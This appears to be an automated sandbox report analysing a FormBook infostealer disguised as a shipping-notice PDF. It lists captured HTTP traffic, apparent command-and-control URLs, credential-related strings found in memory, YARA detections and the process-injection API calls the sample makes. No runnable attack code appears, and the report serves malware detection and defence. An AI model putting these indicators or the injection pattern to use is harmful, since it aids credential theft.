Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.skystargazeguide.store Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 04:36:43 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 04:36:46 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 04:36:49 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Sep 2024 04:36:51 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: CaddyDate: Fri, 27 Sep 2024 04:37:11 GMTContent-Length: 0Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: CaddyDate: Fri, 27 Sep 2024 04:37:13 GMTContent-Length: 0Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: CaddyDate: Fri, 27 Sep 2024 04:37:17 GMTContent-Length: 0Connection: close
            Source: sort.exe, 0000000B.00000002.3147958771.00000000066D0000.00000004.00000800.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000003456000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.antura.partners/px.js?ch=1
            Source: sort.exe, 0000000B.00000002.3147958771.00000000066D0000.00000004.00000800.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000003456000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.antura.partners/px.js?ch=2
            Source: sort.exe, 0000000B.00000002.3147958771.00000000066D0000.00000004.00000800.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000003456000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.antura.partners/sk-logabpstatus.php?a=K3ZvUk8rMHZ6cWJBTjJIV04zS2R2RnBlczJZWldicnJFSmlpMmp
            Source: AVyNLNHPrma.exe, 0000000C.00000002.3146774474.0000000005370000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.exhibitarrange.shop
            Source: AVyNLNHPrma.exe, 0000000C.00000002.3146774474.0000000005370000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.exhibitarrange.shop/yxqi/
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_a
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2#b
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: sort.exe, 0000000B.00000003.1796990827.0000000008175000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: shipping notification_pdf.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0042C0E3 NtClose,8_2_0042C0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036735C0 NtCreateMutant,LdrInitializeThunk,8_2_036735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672B60 NtClose,LdrInitializeThunk,8_2_03672B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03672DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03672C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03674340 NtSetContextThread,8_2_03674340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03673010 NtOpenDirectoryObject,8_2_03673010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03673090 NtSetValueKey,8_2_03673090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03674650 NtSuspendThread,8_2_03674650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672BE0 NtQueryValueKey,8_2_03672BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672BF0 NtAllocateVirtualMemory,8_2_03672BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672BA0 NtEnumerateValueKey,8_2_03672BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672B80 NtQueryInformationFile,8_2_03672B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672AF0 NtWriteFile,8_2_03672AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672AD0 NtReadFile,8_2_03672AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672AB0 NtWaitForSingleObject,8_2_03672AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_036739B0 NtGetContextThread,8_2_036739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672F60 NtCreateProcessEx,8_2_03672F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672F30 NtCreateSection,8_2_03672F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672FE0 NtCreateFile,8_2_03672FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672FA0 NtQuerySection,8_2_03672FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672FB0 NtResumeThread,8_2_03672FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672F90 NtProtectVirtualMemory,8_2_03672F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672E30 NtWriteVirtualMemory,8_2_03672E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672EE0 NtQueueApcThread,8_2_03672EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672EA0 NtAdjustPrivilegesToken,8_2_03672EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672E80 NtReadVirtualMemory,8_2_03672E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03673D70 NtOpenThread,8_2_03673D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672D30 NtUnmapViewOfSection,8_2_03672D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672D00 NtSetInformationFile,8_2_03672D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672D10 NtMapViewOfSection,8_2_03672D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03673D10 NtOpenProcessToken,8_2_03673D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672DD0 NtDelayExecution,8_2_03672DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672DB0 NtEnumerateKey,8_2_03672DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672C60 NtCreateKey,8_2_03672C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672C00 NtQueryInformationProcess,8_2_03672C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672CF0 NtOpenProcess,8_2_03672CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672CC0 NtQueryVirtualMemory,8_2_03672CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03672CA0 NtQueryInformationToken,8_2_03672CA0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03934340 NtSetContextThread,LdrInitializeThunk,11_2_03934340
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03934650 NtSuspendThread,LdrInitializeThunk,11_2_03934650
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039335C0 NtCreateMutant,LdrInitializeThunk,11_2_039335C0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_03932BA0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_03932BF0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932BE0 NtQueryValueKey,LdrInitializeThunk,11_2_03932BE0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932B60 NtClose,LdrInitializeThunk,11_2_03932B60
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932AD0 NtReadFile,LdrInitializeThunk,11_2_03932AD0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932AF0 NtWriteFile,LdrInitializeThunk,11_2_03932AF0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_039339B0 NtGetContextThread,LdrInitializeThunk,11_2_039339B0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932FB0 NtResumeThread,LdrInitializeThunk,11_2_03932FB0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932FE0 NtCreateFile,LdrInitializeThunk,11_2_03932FE0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932F30 NtCreateSection,LdrInitializeThunk,11_2_03932F30
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_03932E80
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932EE0 NtQueueApcThread,LdrInitializeThunk,11_2_03932EE0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932DD0 NtDelayExecution,LdrInitializeThunk,11_2_03932DD0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_03932DF0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932D10 NtMapViewOfSection,LdrInitializeThunk,11_2_03932D10
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932D30 NtUnmapViewOfSection,LdrInitializeThunk,11_2_03932D30
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_03932CA0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_03932C70
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932C60 NtCreateKey,LdrInitializeThunk,11_2_03932C60
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03933090 NtSetValueKey,11_2_03933090
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03933010 NtOpenDirectoryObject,11_2_03933010
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932B80 NtQueryInformationFile,11_2_03932B80
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932AB0 NtWaitForSingleObject,11_2_03932AB0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932F90 NtProtectVirtualMemory,11_2_03932F90
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932FA0 NtQuerySection,11_2_03932FA0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932F60 NtCreateProcessEx,11_2_03932F60
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932EA0 NtAdjustPrivilegesToken,11_2_03932EA0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932E30 NtWriteVirtualMemory,11_2_03932E30
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932DB0 NtEnumerateKey,11_2_03932DB0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03933D10 NtOpenProcessToken,11_2_03933D10
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932D00 NtSetInformationFile,11_2_03932D00
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03933D70 NtOpenThread,11_2_03933D70
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932CC0 NtQueryVirtualMemory,11_2_03932CC0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932CF0 NtOpenProcess,11_2_03932CF0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_03932C00 NtQueryInformationProcess,11_2_03932C00
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F98AF0 NtCreateFile,11_2_02F98AF0
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F98E00 NtClose,11_2_02F98E00
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F98F70 NtAllocateVirtualMemory,11_2_02F98F70
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F98C60 NtReadFile,11_2_02F98C60
            Source: C:\Windows\SysWOW64\sort.exeCode function: 11_2_02F98D50 NtDeleteFile,11_2_02F98D50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004180D38_2_004180D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004030608_2_00403060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040F9438_2_0040F943
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040F93D8_2_0040F93D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004162C38_2_004162C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004162BE8_2_004162BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040FB638_2_0040FB63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040DBDC8_2_0040DBDC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040DBE38_2_0040DBE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004025008_2_00402500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0042E7538_2_0042E753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0040277C8_2_0040277C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_004027808_2_00402780
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0362D34C8_2_0362D34C
